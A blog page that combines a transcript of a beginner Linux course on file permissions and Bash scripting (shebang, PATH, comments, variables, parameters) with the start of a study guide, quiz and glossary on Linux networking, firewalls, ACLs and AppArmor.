If you remember correctly, when we run ls -al, the output contains a bunch of information followed by the actual file or directory itself. In this section we're going to focus on understanding files and permissions, and I'll also explain the output of the ls command. If you run ls --help and scroll up, you'll see that -l means "use a long listing format", which is why you see all of that information, and -a means "do not ignore entries starting with .", which covers all the hidden dot files. So the -a is for the dot files and the -l is for the long listing. Cool, let's go ahead and start learning about Linux files and permissions next.

I have this awesome diagram that teaches the output of the command ls -l, and more specifically the permissions, which are the core of this section. But let me start from the right and explain the whole output of ls -l. First you have the name of the file or folder listed within that directory; in our case foo.txt and dir, which is a folder, and this could be literally anything. Then we have the date and time, more specifically the last-modified date and time: if you've just created the file, that will be the creation time, and if you change or modify the file, this will reflect it. Then we have the size; note that for a directory, ls -l reports the size of the directory entry itself (typically 4096 bytes), not the total of whatever is inside the folder. In the last section you learned about groups, so next is the group name, i.e. which group the file belongs to, in this case amigoscode for both entries. Then we have the owner, which is the user, in my case also amigoscode; earlier on you saw that we created a user called jamal, and that would be reflected here too. Then we have the number of hard links, two and one, and we'll come back to hard links later.

Finally we have the permissions. The very first character of the sequence is always the file type, followed by the set of permissions. For the file type, d stands for directory and a dash stands for a regular file. The permissions themselves, for example rwxrwxr-x, read as: r for read, w for write, and x for execute. The first three characters belong to the user, meaning the user can perform that set of actions on the file. The second set of three are the group permissions. And the last three are for everyone else, the "others": if you're neither the owner nor in the group, then these apply to you, the rest of the world. And here's an example.
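As an illustration, the output might look something like this (the names, sizes, and dates here are invented to match the example that follows):

```
$ ls -l
drwxrwxr-x 2 amigoscode amigoscode 4096 Mar  1 10:30 dir
-rw-rw-r-- 1 amigoscode amigoscode   12 Mar  1 10:29 foo.txt

# field by field, left to right:
#   d / -         file type: directory or regular file
#   rwxrwxr-x     permissions: user, group, others (r=read, w=write, x=execute)
#   2             number of hard links
#   amigoscode    owner (user)
#   amigoscode    group
#   4096          size in bytes
#   Mar  1 10:30  last-modified date and time
#   dir           file or directory name
```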
For this file, foo.txt, the file type is a dash, so it's a regular file. Then r, w, and a dash, which means the amigoscode user can only read and write, not execute (we'll come back to execute in a second, once we create a Bash script; for folders, execute works a little differently). The next three characters are r, w, and a dash; when there's a dash it means that permission is absent, so the amigoscode group can read and write. And the last three are r followed by two dashes, meaning anyone else can only read. We'll go into the details of the permissions in a second, but this is the general overview of Linux file permissions, and more specifically, when you run ls -l, this is the output. As I said, in this section we want to focus on the permissions themselves.

We're done with Linux, and that's no mean feat. You've learned some key commands and you're already on your way to becoming an expert. But how do we group those commands together? Well, that's where shell scripting comes in. Is shell scripting like a programming language, such as Python or Golang? Exactly: you'll learn about conditions and loops, you'll learn about functions and how to do effective error handling, and that's not all; we have challenging exercises waiting for you to put your skills to the test. I'm looking forward to it. So am I.

Scripting is where Linux comes in really handy, so let's dive into shell scripting, a game changer for anyone who wants to automate tasks in Linux. First things first: what is Bash? Bash stands for Bourne Again SHell, a bit of a fun name, isn't it? It's essentially a command-line interpreter, which in simple terms means it's your gateway to communicate with your computer using text-based commands. With Bash you boost efficiency, skyrocket productivity, and can effortlessly streamline tasks that might otherwise be tedious. Think of Bash as a way to create a sequence of commands, automating tasks and performing complex operations without breaking a sweat.

Now, how do you write these magical scripts? All you need to start is an editor. It could be as simple as Vim, which we've covered in this course, or a feature-rich editor like Visual Studio Code; your choice. Once you've penned down your script, save it with the extension .sh, which tells your system: hey, this is a Bash script.

Now let's explore some fundamental elements of Bash scripting. As we talk, remember that true understanding comes from practical application, which we'll delve into shortly. First up, variables: think of them as containers; they store and manipulate data for you. Typically denoted by something like $variable_name, variables can hold a variety of data, be it strings, numbers, or even arrays. Moving on to conditionals: they are the script's decision makers, allowing it to make choices based on specific conditions; based on whether something is true or false, different blocks of code will run, making your scripts dynamic and responsive. Next up, loops: loops let you repeat instructions over and over as needed. With for loops and while loops you can iterate over lists, sift through directories, or continue a task until a specific condition is met. Last but not least, functions: imagine grouping a set of commands into one block that you can call upon multiple times throughout your script. They're the essence of code reusability, modularity, and organization in your script, a very key component when it comes to script writing.
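Since we'll practice each of these shortly, here's a tiny illustrative script (not from the course itself) that touches all four building blocks at once:

```bash
#!/bin/bash

name="world"                  # variable: a container for data

greet() {                     # function: a reusable block of commands
    echo "Hello, $1!"
}

for i in 1 2 3; do            # loop: repeat instructions as needed
    if [ "$i" -eq 2 ]; then   # conditional: choose a branch based on a test
        greet "$name"
    else
        echo "iteration $i"
    fi
done
```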
And there you have it: an introduction to shell scripting with Bash. While this is just the tip of the iceberg, armed with these fundamentals you're well on your way to mastering the art of scripting Linux. So without further ado, let's get started.

Let's write a simple script to get a taste of Bash scripting. In this example we'll create a simple script to greet the user. First, let's create our script: we can use the touch command followed by the name of our script; let's call it my_first_script, and make sure you use the extension .sh, which indicates that it's a Bash script. Let's now open our file using vim my_first_script.sh. The first line of every file starts with a shebang line; don't worry too much about this line at the moment, we'll cover it in a future video. Now we echo "Hello World" in our script, then we press Escape and save our file using :wq!. Because scripts are executables, we also have to chmod our script: chmod with the symbolic notation +x followed by the script name. And now we can run our script using the ./ prefix and the script name, and there you have it: Hello World. This is just a basic example, but Bash scripting allows you to do so much more: you can manipulate files, process data, automate backups, and perform complex operations, all through the power of scripting. To become proficient in Bash scripting it's essential to understand the fundamental concepts that form the building blocks of scripting; we'll briefly cover those concepts next. That's all for this video, and I'll see you in the next one.

In this video we'll delve into an important concept called the shebang. The shebang, also known as a hashbang or interpreter directive, plays a crucial role in the execution of Bash scripts. Let's first create a file, for example touch greet.sh, and press Enter. We briefly touched upon the shebang line in the previous video; it's the first line you find in any Bash script: #!/bin/bash. This line is a shebang, and it serves as a directive to the operating system on how to interpret the script; in this case we're asking the system to interpret the script using the bash binary. The path after the exclamation mark essentially points to the specific interpreter or shell that should handle the script. The shebang line provides flexibility by allowing you to specify different interpreters for different types of scripts. For example, if you're writing a Python script, you can use a shebang line that points to the Python binary under /usr/bin instead, and you can decide whether you want Python 3 or Python 2, to ensure the script is executed using the Python interpreter; similarly, for scripts written in Ruby, you'd just change this binary to Ruby, and so on.

Now let's see the impact of the shebang in action. Suppose in this Bash script we want to print "hello world", i.e. write a greeting message. First we write our shebang, #!/bin/bash, then echo "Hello World", then Escape and :wq to save. Remember, Bash scripts are executables, which means we need to give the file executable permission. To do this we use the chmod command followed by the symbolic notation +x and the name of the file, greet.sh, then press Enter. Now this file is executable.
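Putting the lesson together, the whole sequence looks roughly like this (interpreter paths such as /usr/bin/python3 vary by system):

```bash
touch greet.sh        # create the script
vim greet.sh          # add the two lines below, then save with :wq
#   #!/bin/bash
#   echo "Hello World"

chmod +x greet.sh     # give it executable permission
./greet.sh            # prints: Hello World

# Other interpreters go in the shebang the same way, e.g.:
#   #!/usr/bin/python3   for a Python script
#   #!/usr/bin/ruby      for a Ruby script
```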
We can check that this is the case by running ls with the long-format option, and as you can see our greet.sh file now has executable permissions, which is the x here. Okay, let's clear our screen. To run the script we use the ./ prefix followed by the script name, press Enter, and as you can see it prints hello world. Now, this is only one way to run this Bash script: we can also use the command sh, as in sh greet.sh, which gives you the same thing, and we can also use bash greet.sh and press Enter. These two are for when you don't specify the interpreter within the script: if we remove our #!/bin/bash shebang line from the Bash script, we can use these two commands to interpret the script as Bash. Great.

Now, the shebang is not limited to just the Bash shell; you can use different interpreters depending on your needs, and by specifying the correct interpreter in the shebang you ensure that your scripts are executed consistently regardless of which shell or environment they're running in. A quick summary: the shebang line starts with a hash followed by an exclamation mark; it specifies the interpreter or shell that should handle the script; it enables consistent execution of scripts across different environments regardless of whatever shell you're using (even though we're using the zsh shell here, it was still able to interpret the greet.sh file as a Bash script); you can specify different interpreters for different types of scripts; and the shebang line should be placed as the first line of the script, without any leading spaces or characters before it. And that's it. Thanks for watching, and I'll see you in the next one.

In a previous video we learned how to run scripts using ./, sh, and bash. Let's recall our simple script greet.sh: if I do cat greet.sh, we can see that this script prints hello world. We can run it from its current directory using ./greet.sh, but what if we want to run it from anywhere, without specifying its path? Well, the trick is to place our script in one of the directories that's in our PATH environment variable. PATH is an environment variable that tells the shell which directories to search for executable files in response to commands. Let's clear our screen, and if I echo the PATH environment variable we can see that there are several directories separated by colons; any executable file placed in one of these directories can be run from anywhere in the terminal. A common directory for user scripts is /usr/local/bin, this directory over here, so let's move our greet.sh file into it and give it executable permissions. For this we're going to use sudo, because moving scripts into this directory requires superuser permissions: we run sudo mv greet.sh /usr/local/bin/greet; note that we're also changing the name to greet so it becomes easy to run later on. Press Enter and it will ask for your password, so enter it; that's moved greet.sh into the /usr/local/bin directory. Now remember, you also have to chmod, since this is a script, so once again: sudo chmod +x /usr/local/bin/greet, and press Enter. The reason we changed the name to greet is simplicity: this is how we'll call it. Now let's clear our screen.
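A minimal recap of those steps in one place:

```bash
echo "$PATH"                            # colon-separated directories searched for commands
sudo mv greet.sh /usr/local/bin/greet   # move the script and rename it to just "greet"
sudo chmod +x /usr/local/bin/greet      # make sure it is executable
```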
Now if I run the command greet, just like that, it gives me hello world, without using sh and without the current-directory prefix. And if I change directory and call greet, it still works: if I cd to Desktop, for example, I can also run it from there as greet. So we were able to run our script using just its name, without needing to specify any path or use ./, sh, or bash. To recap: by adding our script to one of the directories in the PATH environment variable, we can conveniently run it from anywhere in our terminal. This can be incredibly useful as you build up a library of custom scripts; just be cautious, though, and ensure the scripts you add to global paths are safe and intended for global use. That's all for this video, happy scripting, and I'll see you in the next one.

In this video we'll explore the concept of comments and how they can enhance the clarity and understandability of your scripts. Comments are lines in a script that are not executed as part of the code; instead, they serve as informative text for those of us reading the script. Adding comments to your scripts is considered a best practice because it helps you and others understand the purpose, functionality, and logic of the script. So let's take a look at how comments are written in a Bash script. In Bash there are two types of comments: single-line comments and multi-line comments. First, let's go into our greet.sh file: vim greet.sh and press Enter. Now, we know what the script does: it prints hello world to the console when we run it. Press i to insert; to write a single-line comment, simply start the line with the hash symbol; anything following the hash on that line is treated as a comment, e.g. "# print greeting to the console". For multi-line comments you can enclose the comment text between a colon followed by single quotes, with your comment on the lines between the quotation marks; anything enclosed between them is considered a comment ("this is a multi-line comment"), and we can get rid of this extra line as well. Escape, great. Now, if I exit, save the file, and rerun greet.sh, you'll notice it still only prints hello world; the comment lines are there in the greet.sh file, but because they're taken as comments, they are not executed.

Now let's see the practical benefits of comments in action. Consider a Bash script that renames all .txt files in a directory to have a .bak extension: we open vi extensions.sh, press Enter, and here we have a for loop.
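For reference, a sketch of what such a renaming loop might look like before any comments are added (the ${file%.txt} expansion strips the .txt suffix):

```bash
#!/bin/bash
for file in *.txt; do
    mv "$file" "${file%.txt}.bak"
done
```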
Without comments, the script may appear cryptic, especially for someone unfamiliar with its purpose and inner workings, or someone who's new to Bash scripting and doesn't really know how to write for loops. So in our case it's very important to write comments here to improve understandability. We start with our hash and add our comment: what we're doing in this for loop is renaming all .txt files to .bak, i.e. changing the extension of each file. We can then use a multi-line comment to add more detail about what the script is doing: start with a colon and a single quotation mark, and close with another single quotation mark; anything enclosed between the two quotation marks is considered a comment. So we write the explanation: we're looping through all .txt files in the current directory; we're using the move (mv) command to rename each .txt file to .bak; and finally, this last part of the code is the parameter-expansion syntax that removes the .txt extension and appends .bak. Okay, let's save the script with :wq and exit, then cat the file (and zoom out a little). Notice that by adding comments throughout the script we can provide explanations and context about what the script is actually doing, making it easier for others and ourselves to understand the script's intention.

Comments not only help with script comprehension but also let you temporarily disable or exclude specific sections of code without deleting them. Say we didn't want the script to run these three lines; we can prevent them from running by turning them into comments. Let's go back into our file, press i, and add a hash in front of the first line, so it turns into a comment, and do the same for the remaining two lines. Now this script essentially won't run anything, because we've turned all our commands into comments. We can exit and save.
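After those edits, the script might look roughly like this; note that the : '...' trick is technically the null command being fed a quoted string rather than a true comment syntax, so the text must not contain unescaped single quotes:

```bash
#!/bin/bash

# Rename all .txt files to .bak (single-line comment)

: '
This is a multi-line comment.
We loop over every .txt file in the current directory
and use the mv command to rename each one, replacing
the .txt extension with .bak via the ${file%.txt} expansion.
'

for file in *.txt; do
    mv "$file" "${file%.txt}.bak"
done
```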
If we try running the script with ./extensions.sh (oops, wrong file), we get permission denied, because it's not executable, so let's make it executable with chmod +x and rerun. As you can see, nothing happens, because all our commands have now been commented out. Okay, and that's all you need to know about comments and how useful they are within our scripts. By adding comments to your scripts you improve readability, you foster collaboration within your team, and you ensure the script's purpose remains evident throughout its life cycle: other people can read what the script is doing, so if changes need to be made later, you know where those changes need to happen. Okay, thanks for watching, and I'll see you in the next one.

In this video we'll delve into the world of variables. Variables are an essential component of Bash scripting, as they allow you to store and manipulate data; they make your scripts dynamic and flexible. In Bash, variables are like containers that hold data, such as text strings, numbers, or even arrays. They provide a way to store values that can be accessed and modified throughout the script. So let's look at how variables are created and used in a Bash script. To create a variable, you simply assign a value to it using the assignment operator. First, let's create a file and call it v.sh. In this file, let's begin with our shebang, #!/bin/bash, and then assign a variable called greeting to the string "Hello World". To access the value of this variable, you prepend the variable name with a dollar sign: $greeting. Say we want to use the echo command to output the value stored in greeting: echo $greeting, then Escape and save the file. Make sure you chmod your script to give it executable permission, then run it with the ./ prefix, and there you have it: Hello World.

Now, variables in Bash are not constrained to a specific data type; they can hold different types of data, such as strings, numbers, and arrays. Let's create a variable we can assign a number to: reopen v.sh, open a new line, and assign the count variable the number 42, for example. As you can see, I'm not enclosing 42 in quotes, because I want the script to interpret this as a number and not a string. Then we echo this variable using the same format, echo $count; exit, save the file, and run the script, and there you have it: it prints the number 42 as well as our hello world. Variables can also hold an array: let's create another variable called fruits and assign it the values apple, banana, and orange. We do that using parentheses: the first element is apple, the second element banana, and the third element orange, then close the parentheses; and there you have it, the fruits variable assigned to this array.

You can also use variables within strings to create dynamic output; this is known as variable interpolation. Let's assign a variable name, say to Armid, for example; we can now echo a string that uses variable interpolation to say hello to this name. Escape and :wq to save, run v.sh, and there you have it: hello Armid. It has taken the name variable and inserted it within our string.
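Collected in one place, v.sh might end up looking like this (the array-indexing line is an extra illustration, not from the video):

```bash
#!/bin/bash

greeting="Hello World"                 # string (note: no spaces around =)
count=42                               # number
fruits=("apple" "banana" "orange")     # array
name="Armid"

echo "$greeting"       # Hello World
echo "$count"          # 42
echo "${fruits[1]}"    # banana (arrays are zero-indexed)
echo "Hello $name"     # variable interpolation inside a string
```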
So we're doing variable interpolation in this case: the value stored in name is inserted into the string using the $name syntax. Great, let's summarize what we've learned: variables are created using the assignment operator (=); to access the value of a variable, we prepend its name with a dollar sign; variables can hold different types of data, such as strings, numbers, and arrays; and variable interpolation allows you to use variables within strings to create dynamic output. And that's all for variables; I'll see you in the next one.

In this video we'll dive into the topic of passing parameters to Bash scripts. By allowing inputs from the command line, you can make your scripts more versatile and interactive. Bash scripts can receive input values, known as parameters or arguments, from the command line when they are executed; these parameters allow you to customize the behavior of your script and make it more flexible. Let's look at how to pass parameters to a Bash script. When running a script, you provide the parameters after the script name, separated by spaces: for example, with a script.sh file, you'd run ./script.sh parameter1 parameter2, and so on. In this example we're executing a script called script.sh and passing two parameters, parameter1 and parameter2. Inside the Bash script, you can access these parameters using special variables: $1, $2, $3, and so on.

Let's look at an example. Create the script.sh file and start with our shebang, #!/bin/bash. Say we want to echo three parameters: for the first, we echo "Parameter 1" together with the special variable $1, which grabs the value of the first parameter passed into the script when we run it. Let's have this line two more times: copy and paste, so for parameter two we have $2, and for parameter three we have $3. In this snippet we're using the echo command to display the value of these three parameters. Escape and save the file. Now when I call ./script.sh I can pass in parameters: say the first parameter is hello and the second is hi, then press Enter. As you can see, because we've only passed in two parameters, it only prints the first two, hello and hi: hello is taken as $1 and hi is taken as $2. If I pass a third parameter, say hey, and press Enter, now we have a third parameter and it's printed on the third line. Excellent. So when executing the script with parameters, the values passed on the command line are substituted into the script's parameter variables $1, $2, and $3.

Now, what if we wanted to access all the parameters passed into a script? We can do this using another special variable. Go into script.sh, add another line, and echo "All parameters" followed by the special variable: a dollar sign and the at symbol, inside quotation marks ("$@"). Save the script, and when we run it we get "All parameters" followed by every parameter we passed into the script; in other words, the echo command on that line outputs all the parameters passed to the script.
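A sketch of the finished script.sh and a sample run:

```bash
#!/bin/bash
echo "Parameter 1: $1"
echo "Parameter 2: $2"
echo "Parameter 3: $3"
echo "All parameters: $@"

# sample run:
#   ./script.sh hello hi hey
#   Parameter 1: hello
#   Parameter 2: hi
#   Parameter 3: hey
#   All parameters: hello hi hey
```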
Great, let's summarize what we've learned: parameters are provided after the script name when executing a script; inside the script, parameters can be accessed using $1, $2, $3, and so on, based on their position; and the special variable $@ can be used to access all the parameters passed to the script. By allowing inputs through parameters, you make your scripts more interactive and versatile. Great, that's all for this video, and I'll see you in the next one.

Phew, well done for reaching the end of this course! But your journey doesn't stop here: whether you're taking the DevOps path or the software engineering path, this is only the beginning, and we have courses to help you on that journey. It was a pleasure teaching you, and we'll see you in the next one. Assalamualaikum.

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Linux System Administration: Security, Networking, and Virtualization

    Linux System Administration: Security, Networking, and Virtualization

This comprehensive guide explores essential Linux system administration tasks, focusing on security, resource management, and cloud technologies. It covers network configuration, firewall management using ufw and iptables, and secure communication via SSH and GPG. User authentication methods, including password-based and key-based authentication, are examined. Furthermore, the guide details file system security, including file permissions, Access Control Lists (ACLs), and the use of chroot jails for isolating processes. Disk usage analysis, cleanup procedures, and system performance monitoring tools like top, free, and vmstat are explained. Finally, it provides an introduction to virtualization and cloud computing concepts, Docker, and container orchestration using Kubernetes and Docker Swarm.

    Network Fundamentals and Security: A Comprehensive Study Guide

    Study Guide Outline

    I. Basic Networking Concepts * IP Addressing: IPv4 vs IPv6 * Subnets and Subnet Masks: Calculation, Network vs Host Bits * Domain Name System (DNS): Resolution Process, Hierarchy (Root Servers, TLD Servers, Authoritative Servers)

    II. Linux Network Configuration * Interface Configuration: ifconfig (Legacy) vs ip (Modern) * Network Manager Command Line Interface (NMCLI): Connection Management, Wi-Fi Management

    III. Network Troubleshooting * Ping: Testing Reachability, Packet Loss * Traceroute: Path Analysis, Hop Count * Netstat & SS: Monitoring Network Connections, Listening Ports

    IV. Network Security Fundamentals * Firewall Management: Uncomplicated Firewall (UFW), IP Tables * AppArmor: Application Security Policies * Password Management: Best Practices, Multi-Factor Authentication (MFA)

    V. Encryption and Key Management * GPG (GNU Privacy Guard): Public Key Cryptography, Encryption/Decryption, Key Management (Import/Export)

    VI. System Monitoring and Logging * System Logging: Syslog, Authentication Logs, Kernel Logs * Disk Usage Analysis: DF, DU * Process Monitoring: Top, Htop * Memory Monitoring: Free, VMStat

    VII. Virtualization and Cloud Computing * Virtualization Concepts: Virtual Machines (VMs), Hypervisors (Type 1 vs Type 2), KVM * Containerization: Docker, Docker Commands

VIII. VM/Container Management Tools * libvirt: virsh, virt-install * Docker: Docker CLI

    Quiz: Short Answer Questions

1. What is the primary difference between IPv4 and IPv6 addresses?
2. Explain the purpose of a subnet mask.
3. Describe the steps in the DNS resolution process.
4. What are the key differences between using ifconfig and ip commands in Linux?
5. How does the ping command help in network troubleshooting?
6. What information does the traceroute command provide about a network route?
7. What is the role of the Uncomplicated Firewall (UFW) in Linux systems?
8. Explain the purpose of Multi-Factor Authentication (MFA).
9. Describe the difference between Type 1 and Type 2 hypervisors.
10. What is the purpose of Docker containers?

    Answer Key: Short Answer Questions

    1. IPv4 uses a 32-bit numerical label while IPv6 uses a 128-bit alphanumeric label. IPv6 was developed to overcome the address limitations of IPv4.
    2. A subnet mask is used to divide an IP address into network and host portions, determining how many addresses are available within a network. It also defines which part of the IP address identifies the network and which part identifies the host.
    3. The DNS resolution process begins with a query from a client to a DNS resolver, which may recursively query root servers, TLD servers, and authoritative servers until the IP address corresponding to the domain name is found. The resolver then returns the IP address to the client.
    4. ifconfig is a legacy tool for network interface configuration while ip is the modern replacement; ifconfig is still in use. ip is part of the IP Route 2 package and offers more comprehensive functionality and features than ifconfig.
    5. ping tests the reachability of a host by sending ICMP packets and measuring the round trip time for those packets. This helps identify network connectivity issues and packet loss.
    6. traceroute identifies the path a packet takes to reach a destination, including each hop (router) along the way. It also measures the time it takes to reach each hop, helping pinpoint delays or failures.
    7. UFW is a user-friendly interface for managing iptables firewall rules in Linux. It simplifies the process of configuring firewall rules to allow or deny network traffic based on specific criteria.
    8. MFA enhances password-based authentication by requiring users to provide multiple verification factors such as passwords and one-time codes sent to a phone. This reduces the risk of unauthorized access even if the password is stolen.
    9. A Type 1 hypervisor (bare metal) runs directly on the hardware, offering better performance, while a Type 2 hypervisor runs on top of an existing operating system. Type 2 hypervisors tend to be easier to install.
    10. Docker containers package applications and their dependencies into portable units that can run consistently across different environments. This ensures that the application behaves the same regardless of the host system.

    Essay Format Questions

    1. Discuss the evolution of network configuration tools in Linux, comparing and contrasting ifconfig and ip. Explain the advantages of using ip over ifconfig in modern network management.
    2. Explain the significance of the Domain Name System (DNS) in the context of network communication. Describe the hierarchy of DNS servers and the steps involved in resolving a domain name to an IP address. What security vulnerabilities are associated with DNS?
    3. Analyze the role of firewalls in network security and discuss the advantages and disadvantages of using UFW and IP Tables for managing firewall rules. In what scenarios might an administrator prefer one over the other?
    4. Compare and contrast Type 1 and Type 2 hypervisors. Discuss the advantages and disadvantages of each type, providing specific examples of virtualization technologies that fall under each category. In what scenarios would you recommend each type of hypervisor?
    5. Explain the benefits of containerization using Docker. Discuss the key Docker commands and concepts, such as Docker images, containers, and Dockerfiles. How do Docker containers improve application deployment and scalability?

    Glossary of Key Terms

    • IP Address: A unique numerical identifier assigned to each device connected to a network, enabling communication.
    • Subnet Mask: A mechanism for dividing an IP address into network and host portions, defining network size.
    • DNS (Domain Name System): A hierarchical system that translates domain names into IP addresses.
    • Resolver: A DNS server that performs recursive queries to resolve domain names.
    • TLD (Top-Level Domain) Server: DNS servers for top-level domains like .com, .org, and .net.
    • Authoritative DNS Server: A DNS server that holds the definitive answer for a domain’s DNS records.
    • ifconfig: A legacy command-line tool for configuring network interfaces on Linux.
    • ip: A modern command-line tool for configuring network interfaces on Linux, part of the IP Route 2 package.
    • NMCLI (Network Manager Command Line Interface): A command-line tool for managing network connections in Linux.
    • Ping: A network utility used to test the reachability of a host.
    • Traceroute: A network utility used to trace the path a packet takes to a destination.
    • Netstat: A command-line tool for displaying network connections, routing tables, and interface statistics.
    • SS (Socket Statistics): A modern command-line tool that provides similar functionality to netstat.
    • UFW (Uncomplicated Firewall): A user-friendly interface for managing firewall rules in Linux.
    • IP Tables: A powerful firewall utility in Linux for configuring packet filtering rules.
    • AppArmor: A Linux kernel security module that allows administrators to restrict application capabilities.
    • MFA (Multi-Factor Authentication): A security measure that requires users to provide multiple verification factors.
    • GPG (GNU Privacy Guard): A tool for encrypting and decrypting data using public key cryptography.
    • Hypervisor: Software that creates and runs virtual machines (VMs).
    • Virtual Machine (VM): A software-based emulation of a physical computer.
    • Type 1 Hypervisor: A bare-metal hypervisor that runs directly on the hardware.
    • Type 2 Hypervisor: A hosted hypervisor that runs on top of an existing operating system.
    • KVM (Kernel-based Virtual Machine): A type 1 hypervisor integrated into the Linux kernel.
• virsh: Command-line tool that interacts with KVM.
    • VirtualBox: A popular type 2 hypervisor for running virtual machines.
    • Containerization: A virtualization method that isolates applications and their dependencies into portable containers.
    • Docker: A popular containerization platform for building, shipping, and running applications in containers.
    • Image (Docker): An immutable, packaged snapshot of an application and its dependencies.
    • Container (Docker): A running instance of a Docker image.
• libvirt: A toolkit providing APIs and management tools for virtualization environments.
    • df: Displays disk space usage for file systems.
    • du: Displays disk space usage for files and directories.
    • Top: Displays a dynamic real-time view of running processes.
    • Htop: Displays a dynamic real-time view of running processes with a user-friendly, colorful interface.
    • Free: Displays the amount of free and used memory in the system.
    • Vmstat: Displays information about virtual memory, system processes, and CPU activity.
    • Syslog: A standard protocol for logging system events and messages.
• Chroot: An operation that changes the apparent root directory for the current running process and its children.
    • ACL (Access Control List): A list of permissions attached to an object. It specifies which users or groups have access to the object and what operations they are allowed to perform.

    Linux System Administration and Networking Fundamentals


    Briefing Document: Networking and System Administration Fundamentals

    This document summarizes core concepts and tools related to networking, security, and system administration within a Linux environment. The information is derived from a training series focusing on fundamental principles and practical commands.

    I. Networking Fundamentals

• IP Addressing: IP addresses are unique identifiers for devices on a network, enabling communication. "IP addresses are unique identifiers assigned to devices that are connected to a network; they allow devices to communicate with each other and are very important for network management and communication."
• IPv4: The original IP addressing scheme, using 32-bit numerical labels. Limited to approximately 4.3 billion unique addresses. Each octet ranges from 0 to 255, with usable host addresses typically running from 1 to 254, since the lowest and highest addresses are reserved. The standard notation is four numbers separated by dots, such as 192.168.1.1.
• Subnet Masks: Define the network portion and host portion of an IP address. Example: given 192.168.1.1 with a subnet mask of 255.255.255.0, the first three octets (192.168.1) represent the network, and the last octet identifies the host.
    • Reserved Addresses: Two addresses within a subnet are always reserved: the network address (often .0) and the broadcast address (often .255).
    • DNS (Domain Name System): Translates domain names (e.g., google.com) into IP addresses. This process involves a hierarchy of DNS servers.
    • The user’s computer sends a DNS query to a “DNS resolver.” The resolver then contacts root DNS servers.
• "The resolver will contact one of the root DNS servers, and these are at the top of the DNS hierarchy, above the .coms and the .orgs and the .nets."
• Root servers direct the query to the appropriate Top-Level Domain (TLD) server (e.g., .com, .org). The TLD server then points the resolver to the authoritative server that holds the domain's records.
• "The authoritative server is going to be at this particular location, so that gets sent back to the local DNS server."
    • The DNS resolver receives the IP address and provides it to the user’s computer, loading the website.
    • DHCP (Dynamic Host Configuration Protocol): Automatically assigns IP addresses to devices on a network.

    II. Network Interface Configuration

    • ifconfig (Interface Configuration): A command-line utility used to configure network interfaces on Unix-based systems (Linux, macOS). Allows viewing and assigning IP addresses, controlling interface states (up/down).
• Despite being nominally deprecated, ifconfig remains in use on some systems. The command ifconfig without arguments lists all network interfaces and their configurations.
• "The simplest version of the command is to just type ifconfig and press Enter, and it lists all the network interfaces on your system along with their current configurations: the IP addresses assigned to them, any network masks or broadcast addresses, and everything else appropriate for that particular configuration."
• ip (iproute2): The modern replacement for ifconfig. Provides similar functionality for managing network interfaces. ip a or ip address displays network interfaces and details, producing output very similar to ifconfig.
    • nmcli (NetworkManager Command-Line Interface): A command-line tool for managing network connections on Linux.
    • nmcli connection up <interface>/nmcli connection down <interface>: Activates or deactivates a network interface.
    • nmcli device status: Displays the status of network devices (connected, disconnected, unavailable).
    • nmcli device wifi list: Lists available Wi-Fi networks, including SSIDs, signal strength, and security type.
    • nmcli device wifi connect <SSID> password <password>: Connects to a Wi-Fi network.

    III. Network Troubleshooting Tools

    • ping: Tests the reachability of a host (computer or server) by sending ICMP packets. Measures round-trip time.
• "You basically ping the IP address or you ping the website, and you can also measure the round-trip time for the messages sent to that host, to establish how strong the connection is or how quickly that particular host responds to you."
    • The -c option specifies the number of packets to send.
    • The -i option sets the interval between packets.
    • The -f option floods the target with packets.
    • traceroute: Tracks the route a packet takes to reach a destination by incrementing the “time to live” (TTL) value. Helps identify delays or failures along the route.
    • The -m option specifies the maximum number of hops.
• The -p option sets the base destination port used by the probes (packet size is given as an optional trailing argument).
    • netstat (Network Statistics): Displays network-related information, including connections, routing tables, and interface statistics.
    • Options include: -t (TCP ports), -u (UDP ports), -l (listening ports), and -n (numerical addresses).
    • ss (Socket Statistics): A modern alternative to netstat, offering better performance and more detailed output. Part of the IP Route2 suite.
    • Options are very similar to netstat, such as displaying TCP, UDP, and listening ports

    IV. Firewall Management

    • ufw (Uncomplicated Firewall): A user-friendly command-line interface for managing iptables firewall rules.
    • sudo ufw enable: Activates the firewall.
    • sudo ufw disable: Deactivates the firewall.
    • sudo ufw allow <service>: Allows traffic for a specific service (e.g., SSH).
    • sudo ufw deny <port>: Blocks traffic on a specific port.
    • sudo ufw status: Shows the current firewall status and active rules.
    • sudo ufw allow from <IP address> to any port <port>: Allows traffic from a specific IP address to a specific port.
    • sudo ufw logging on/off: Enables or disables firewall logging.
• sudo ufw default allow incoming: Allows all incoming traffic by default.
• sudo ufw default deny incoming: Denies all incoming traffic by default.
• sudo ufw default allow outgoing: Allows all outgoing traffic by default.
• sudo ufw default deny outgoing: Denies all outgoing traffic by default.
    • iptables: A more complex, low-level firewall management tool.
    • Uses chains (INPUT, OUTPUT, FORWARD) to define packet filtering rules.
• sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: Enables NAT masquerading, hiding internal IP addresses. "It'll change the source IP address when it gets sent out to the world to whatever the masqueraded, disguised IP address would be."
    • The mangle table allows for packet alteration, such as changing the type of service.
    • sudo iptables -L: Lists the current rules for the filter table.

    V. Security Enhancements

    • Chroot Jails: Creates an isolated environment for a process, limiting its access to the file system.
    • “effectively you’re isolating a subset of the file system and you create what’s known as the chroot jail”.
    • Enhances security by restricting the damage caused by untrusted programs.
    • Useful for testing, development, and system recovery.
    • Steps include creating a directory, populating it with necessary binaries and libraries, and using the chroot command.
    • File Permissions and Ownership: Controls access to files and directories based on user, group, and others.
    • Permissions: Read (r), Write (w), Execute (x). Numerical values: r=4, w=2, x=1.
    • chmod: Command to change file permissions. Can use symbolic notation (e.g., chmod u+rwx file.txt) or numerical notation.
    • chown: Command to change file ownership.
    • Access Control Lists (ACLs): Provides fine-grained control over file and directory permissions, allowing specific access levels for multiple users and groups.
• "Access Control Lists are a way to provide more fine-grained control over file and directory permissions."
• setfacl: Sets ACL entries. Options include -m (modify), -x (remove specific entry), -b (remove all entries), and -d (set default ACLs, used on directories).
    • getfacl: Views ACL entries.
    • AppArmor: A security module that confines programs to a limited set of resources.
• "AppArmor is a security module, installed natively in Ubuntu, that enhances the security of an application or a set of applications. It works by creating profiles that confine the actions of the application, or the group of applications you're protecting, to that profile."
    • Modes: Enforce (blocks unauthorized access) and Complain (allows access but logs it).
    • aa-status: Displays the current AppArmor status.
    • aa-enforce: Sets a profile to enforcing mode.
    • aa-complain: Sets a profile to complain mode.
